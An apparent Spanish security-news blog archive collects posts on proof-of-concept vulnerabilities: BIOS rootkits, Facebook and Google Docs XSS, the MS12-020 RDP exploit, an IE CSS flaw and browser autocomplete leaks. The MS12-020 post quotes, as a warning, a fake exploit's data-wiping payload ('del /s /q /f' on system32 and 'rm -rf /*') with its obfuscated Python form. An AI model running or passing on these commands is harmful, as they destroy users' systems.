Rootkits basados en BIOS

junio 17, 2013 § Deja un comentario

Todo lo descrito aquí se basa en un proyecto que concluyó a principios de 2011, que fue originalmente iniciado varios años antes. Mientras Wesley Wineberg asistía a la CanSecWest en 2009, Anibal Sacco y Alfredo Ortega de Core Security hicieron una presentación sobre “Persistent BIOS Infection” [PDF] en la que demostraron cómo era posible que parchear el BIOS para hacer algunas cosas desagradables e impresionantes. Su reportaje en Phrack está aquí. Un año más tarde Wineberg tenía que hacer un proyecto a largo plazo así que decidió volver a la carga sobre las BIOS y poner en práctica algunos trucos.

En los últimos años han cambiado muchas cosas en el mundo del PC BIOS. Ahora los estándades dicen que el firmware y el BIOS debe ser firmado y la arquitectura UEFI cambio la forma en que las BIOS eran diseñadas tradicionalmente. La primera evidencia de malware que en realidad infectaba BIOS vino de la mano Webroot con “Mebromi” y de manera bastante similar a la mostrada por Wineberg.

Medidas de seguridad sencillas como el firmado de las actualizaciones de BIOS evitarían fácilmente este tipo de ataques y ya se han hecho algunas investigaciones al respecto, como la presentación de “Attacking Intel BIOS” [PDF] de Rafal Wojtczuk y Alexander Tereshkin.
Así que vale la pena señalar que nada de lo que aquí se describe está diseñado para presentar nuevas vulnerabilidades, sino que es una prueba de concepto que puede ser fácilmente probada y modificada.

El objetivo original del proyecto BIOS Based Rootkits fue determinar si los ataques y malware basados ​​en BIOS era factible y ser capaz de verlos funcionando, a pesar de las nuevas tecnologías están haciendo este tipo de ataques menos relevante.

Si no quieres leer todo el informe y sólo quieres probar los resultados, haz clic aquí para leer las instrucciones y/o ver el video.

Cristian de la Redaacción de Segu-Info

Vulnerabilidades de XSS almacenados en Facebook

abril 22, 2013 § Deja un comentario

Nir Goldshlager, foundador y CEO de Break Security ha publicado una serie de vulnerabilidades de Cross-site Scripting almacenado en Facebook, que afectan al Chat, al Check In y a FB Messenger.

En este post, Nir comenta y publica los videos de las pruebas de concepto (PoC) de las vulnerabilidades encontradas.

Cristian de la Redacción de Segu-Info

Exploit público para MS12-020 (Parchea!)

marzo 15, 2012 § Deja un comentario

El pasado martes, Microsoft lanzó una actualización crítica MS12-020 (que supersede a MS11-065), que corrige una vulnerabilidad en la implementación del protocolo RDP. Según la descripción, esta vulnerabilidad podría permitir a un atacante remoto no autenticado ejecutar código arbitrario en el sistema afectado.

Específicamente, según el sistema operativo, el MS12-020 incluye la KB2671387 (Remote Code Execution – CVE-2012-0002) y KB2667402 (Denial of Service – CVE-2012-0152) para las nuevas versiones de Windows o la KB2621440 para Windows XP y 2003. La vulnerabilidad afecta a varios archivos pero principalmente a Rdpwd.sys y Rdpcore.dll.

Las empresas suelen publicar el puerto RDP (TCP 3389) a través de Internet para permitir el acceso remoto a sus servidores y estaciones de trabajo. Este factor hizo que sea muy atractivo para los atacantes realizar ingeniería inversa del parche, entender los detalles del error y elaborar un exploit chino, IIIII (aparente válidos), el cual ya ha sido publicado en las últimas horas. No se debe perder de vista que anteriormente ya había circulado otro exploits falso supuestamente creado “by Sabu” y que hace referencia a “that chinese shit”.

La vulnerabilidad afecta la implementación de RDP de Microsoft Windows 2000, XP SP2 y SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2 y Windows 7. Por estas razones, se recomienda aplicar el parche MS12-020 tan pronto como sea posible en su entorno y también se puede aplicar un filtro para Snort desde Emerging Threats con el SID 2014384 (RDP DoS attack as described in KB2667402/CVE-2012-0152).

Actualización: ya se publicó un código válido en Python.

Actualización 16/03: la vulnerabilidad y PoC original fue reportada a Microsoft por Luigi Auriemma (TippingPoint’s Zero Day Initiative) y ya se encuentra público en Exploit-DB.
Al parecer el exploit chino empaquetado que fue publicado ayer, es exactamente el mismo de Luigi, lo cual lleva a preguntarse ¿quién lo filtró?. Si bien el exploit aún causa algún pantallazo azul, esta publicación hará que no pase demasiado hasta que aparezca el primer gusano que aproveche la vulnerabilidad.

Actualización: Luigi ha confirmado que la fuente de la fuga ha sido Microsoft en sus anuncios a los partners a través del programa Microsoft Active Protection Program (MAPP). Microsoft ha confirmado esta información.

Microsoft ha publicado una serie de soluciones, en el caso de no desear instalar el parche aún, lo cual sigue siendo lo más recomendable:

  1. Deshabilitar Terminal Services, Escritorio remoto, Asistencia remota y la característica Lugar de trabajo remoto en Web de Windows Small Business Server 2003 si no se necesitan.
  2. Bloquear el trafico entrante al puerto TCP 3389 en el firewall perimetral de la empresa
  3. Habilitar la autenticación de nivel de red en sistemas que ejecuten ediciones compatibles de Windows Vista, Windows 7, Windows Server 2008 y Windows Server 2008 R2. Para esto se puede instalar Microsoft Fix It 50844

Actualización: hay al menos 2400 servidores RDP (puerto 3389) que aparecen listados públicamente en Shodan. ¿Ya te buscaste, ya parcheaste?

Actualización: más detalles del código y las diferencias en los binarios.

Actualización: publican un código funcional en Python que realiza un DoS sobre XP SP2.

Actualización: Core acaba de actualizar su módulo de DoS con este exploit.

Actualización: dos comics de cómo se desarrollaron los eventos sobre la aparición pública del 0-Day gracias al programa MAPP.

Actualización 17/03: Sophos ha confirmado la aparición del primer troyano que aprovecha la vulnerabilidad.

Actualización: se puede averiguar si la actualización ya se encuentra instalada desde Inicio -> Todos los programas -> Windows Update -> Ver historial de actualizaciones y verificar que se encuentre la KB2667402. Además también se puede ejecutar cualquiera de estos comandos:
wmic qfe | find "KB2667402"
wmic qfe | find "KB2621440"

Actualización: se ha confirmado que el exploit funciona en Windows 2000, para el cual no hay actualización (y quizás nunca la haya). ¿Todavía no actualizaste tu sistema operativo?

Actualización: video de un DoS sobre Windows 2008 R2 con el código del exploit en Ruby.

Actualización: se ofrece una recompensa de U$S1500 a la primera persona que desarrolle una PoC con un payload arbitrario para Metasploit.

Actualización 18/03: Dan Kaminsky ha escaneado 300 millones de IP (8,3% de Internet) y ha encontrado 415.000 direcciones con evidencia del protocolo RDP. Extrapolando los datos a partir de esa muestra, se puede afirmar que hay aproximadamente cinco millones de RDP en Internet.

Actualización: uno de los supuestos exploits publicados en Python, es un payload que elimina el sistema operativo. Su autor es “Verye” y el enlace a dicho código no ha sido publicado aquí. El payload es el siguiente:
del /s /q /f C:\windows\system32\* > NUL 2>&1
rm -rf /* > /dev/null 2>&1

Payload convertido a ASCII:
"__import__('os').sys"
"tem('del /s /q /f C:"
"\windows\system32\* "
"> NUL 2>&1') if 'Win"
"' in __import__('pla"
"tform').system() els"
"e __import__('os').s"
"ystem('rm -rf /* > /"
"dev/null 2>&1') #hi "
"there ^_~ feel free "
"to spread this with "
"the rm -rf replaced "
"with something more "
"insidious"

Ahora más que nunca debe prestarse atención a lo que se baja y codea.

Actualización: Stratsec realizó otro análisis a bajo nivel de la vulnerabilidad.

Actualización: @caseyjohnellis ha publicado un servicio RDPCheck para verificar si el servicio RDP se encuentra habilitado en su organización.

Actualización: hemos publicado una FAQ sobre MS12-020.

Actualización 19/03: se ha publicado un procedimiento para crear una honeypot para detectar tráfico anómalo sobre RDP (TCP 3389) y posibilite la detección de un gusano que explote la vulnerabilidad.

Actualización: Metasploit siguió el ejemplo de Core y publicó una actualización para su framework (capturas de 0verl0ad). Mientras tanto sólo hay rumores de haber encontrado la forma de obtener una ejecución de código remota (RCE).

Actualización: supuestamente apareció una herramienta china para ejecutar ataques de DoS masivos. Esto no ha sido verificado y sólo se puede decir que VirusTotal la detecta como troyano.

Actualización 22/03: Nessus incorpora el plugin 58435 para detectar RDP vulnerables.

Cristian de la Redacción de Segu-Info

Microsoft investiga una posible falla en Internet Explorer que permite XSS

septiembre 8, 2010 § Deja un comentario

La semana pasada, se dió a conocer una falla de seguridad en Internet Explorer 8 en la lista de correo Full Disclosure. La falla permite a los atacantes robar información privada de los servicios en línea tales como correo web y Twitter, permitiendo a los atacantes, por ejemplo, eliminar e-mails o enviar tweets desde las cuentas de sus víctimas.

El post fue realizado por Chris Evans, empleado de Google y el motivo del mismo es tratar de persuadir a Microsoft para solucionar la vulnerabilidad, que es una nueva variante de un ataque anterior que hizo público un grupo de estudiantes de Carnegie Mellon en diciembre pasado.

Mientras que los otros navegadores ya han sido corregidos para prevenir el ataque, Internet Explorer aún permanece sin proporcionar protección.

El ataque compromete la política same-origin diseñada para evitar que secuencias de comandos de un dominio accedan a los datos que pertenecen a otro dominio. Por ejemplo, un script de example.org no debería tener acceso a las cookies o contenido de la página de twitter.com. Estos ataques, en un sitio (controlado por el atacante) comprometen los datos sensibles de otro sitio y se denominan Cross Site Scripting (XSS).

Este ataque en especial es un enfoque diferente para incrustar hojas de estilo (CSS), que se utilizan para controlar las fuentes, colores y diseño de las páginas HTML. CSS es particularmente interesante para este tipo de ataques debido a la forma en que es interpretado por el navegador. El manejo tolerante a fallos de los archivos CSS es lo que conduce a la vulnerabilidad.

Por ejemplo, este Tweet (deliberadamente construido), cuando se utiliza como un archivo CSS, el navegador interpretará la página como si lo fuera, pero permite embeber en los Tweets contenido dañino.

Internet Explorer 9 Beta también es vulnerable y las versiones anteriores del navegador también podrían verse afectados.

Microsoft ha respondido que está investigando la falla, pero todavía no hay actualización disponible y ya es posible ver la PoC.

Esta no es la primera vez que un empleado de Google divulga un fallo de seguridad de Microsoft. Tavis Ormandy recibió tanto críticas como apoyo a su decisión de hacer público un fallo en junio pasado. Esta situación es un poco diferente, ya que el fallo se hizo público gracias al documento de Carnegie Mellon y las revisiones realizadas por los otros fabricantes.

Fuente: Arstechnica

Cristian de la Redacción de Segu-Info

Vulnerabilidad en el autocompletar en los navegadores

agosto 6, 2010 § Deja un comentario

En la última Black Hat conference, evento donde se presentan debates de seguridad Jeremiah Grossman de White Hat Security comentó que el registro que los usuarios realizan en internet a través de sus navegadores mediante la opción de autocompletar formularios presenta vulnerabilidades por las que delincuentes informáticos pueden conseguir sus datos, como cuentas, email y otros datos de mayor relevancia.

El exploit con el que actúan estos ciberdelincuentes se presenta a modo de formulario normal, con etiquetas para nombre, dirección, apellidos, email. Un Script es creado con las primeras coincidencias para cada letra con la posibilidad de autocompletar dichos formularios.

Si el navegador identifica estas coincidencias puede llegar a autocompletar por sí mismo estos campos. Grossman informó a Apple sobre estos sucesos pero que todavía no ha recibido respuesta alguna. Además este tipo de vulnerabilidad se ha detectado en las versiones 6 y 7 de Internet Explorer.

Además Chrome y Firefox pueden presentar también esta vulnerabilidad. Los atacantes puedes conseguir datos relevantes de los usuarios mediante la función de autocomplementar en cualquier navegador puediendo llegar a obtener incluso contraseñas de cuentas relevantes.

Grossman ha publicado una PoC para Safari y un vídeo de demostración y en su blog e informa que Safari ya ha solucionado la vulnerabilidad.

Fuente: OpenSecurity y H-Online

Primer humano "infectado" por un virus informático

mayo 26, 2010 § 5 comentarios

Un científico británico afirma que es el primer hombre en el mundo de infectarse con un virus informático.

Dr. Mark Gasson de la Universidad de Reading contaminó un chip de computadora que se insertó en la mano.

El dispositivo, que le permite pasar a través de puertas de seguridad y activar su teléfono móvil, es una versión sofisticada de los chips de identificación utilizados para etiquetar los animales domésticos.

En los ensayos, el Dr. Gasson mostró que el chip es capaz de transmitir el virus a los sistemas de control externo.

Si otros chips son conectados luego al sistema, ellos también podrían ser afectados, dijo.

El Dr. Gasson admite que es una prueba de concepto, pero piensa que tiene importantes implicaciones para el futuro de dispositivos médicos como los marcapasos e implantes cocleares. Cuando estos se vuelvan más sofisticados, el riesgo de ser contaminados por otros implantes humanos podría ser real.

“Si alguien puede acceder en línea a su implante, esto podría ser grave”, dijo.

El Dr. Gasson trabaja en la Escuela de Ingeniería de Sistemas de la Universidad de Reading y presentará los resultados de su investigación en el Simposio Internacional de Tecnología y Sociedad en Australia el próximo mes.

Traducción: Cristian Borghello – Segu-Info
Fuente: BBC News

POC de un XSS en docs.google.com

noviembre 15, 2009 § Deja un comentario

Esta vulnerabilidad fue presentada en esta misma página en agosto del año pasado y ahora recobra vida!, se trata de un XSS (Cross site scripting) en la aplicación de Google docs.
Gracias de nuevo a Fernando Muñoz (http://www.beford.org) por darme la oportunidad de hacer unas cuantas pruebas sobre la vulnerabilidad.

La vulnerabilidad hasta noviembre 9 del presente año (solucionada) se encontraba en el script “viewer” con la variable “url”, en la raíz de la web docs.google.com (http://docs.google.com/viewer?url=http://”). La vulnerabilidad gira entorno a los enlaces configurados en una palabra, al ingresar como enlace en un texto la cadena “javascript:alert(1);”.

Un atacante podía inyectar código de una forma arbitraria, este código sería evaluado por el navegador como parte de la web docs.google.com, se muestra en el video adjunto como el atacante podría aprovecharse de esta vulnerabilidad para obtener desde la lista de contactos de una víctima hasta su nombre de usuario y contraseña.

El video trata principalmente de hacerle un llamado a todas las personas, y mostrarles como algo tan inofensivo como una presentación o un documento pdf puede llegar a convertirse en un potencial vector de ataque.

Algunos tips de seguridad

Desconfiar de absolutamente TODO con las tecnologías crecientes, como pueden ver en el video, una simple presentación o un archivo PDF pueden ser muy engañosos.

Verificar la identidad de la persona que te manda un correo, no sólo basta con fijarse en la dirección de correo electrónico (Ya que ésta se puede modificar fácilmente), algo simple para verificar la identidad es reconocer el modo de escritura de la persona, y algo más avanzado es observar el correo en crudo (raw).

Nunca dar clic a enlaces enviados por correos electrónicos, a no ser que provenga de una persona conocida y a la cual le tenemos confianza.

Los archivos usados en el video los puedes encontrar en este enlace: http://www.sinfocol.org/archivos/2009/11/docs.google.com_xss.zip, también los pueden encontrar en sus formas individuales en la carpeta http://www.sinfocol.org/archivos/2009/11/

Fuente: Sinfocol

¿Dónde estoy?

Actualmente estás explorando la categoría poc en Seguridad Informática.